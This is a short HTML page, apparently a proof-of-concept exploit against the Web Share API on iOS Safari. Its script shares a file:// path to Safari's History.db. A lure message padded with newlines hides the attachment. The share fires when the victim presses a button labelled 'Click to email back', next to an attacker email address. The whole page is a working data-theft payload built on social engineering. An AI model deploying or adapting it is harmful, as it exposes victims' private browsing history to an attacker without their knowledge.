<html>
<script>
var opts = {text: 'YOU ARE A FATHER NOW!! img.jpg\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n', url: 'file:///private/var/mobile/Library/Safari/History.db'};

function run() {
	navigator.share(opts);
}
</script>
<body>
FREE YOUR MIND!! enterthematrix@cloud-mail.top
<br/>
<img width="400px" height="200px" src="https://de22-engine.flamingtext.com/netfu/tmp28002/coollogo_com-26380996.png">
<br/>
<button onclick='run();'>Click to email back</button>
</body>
</html>
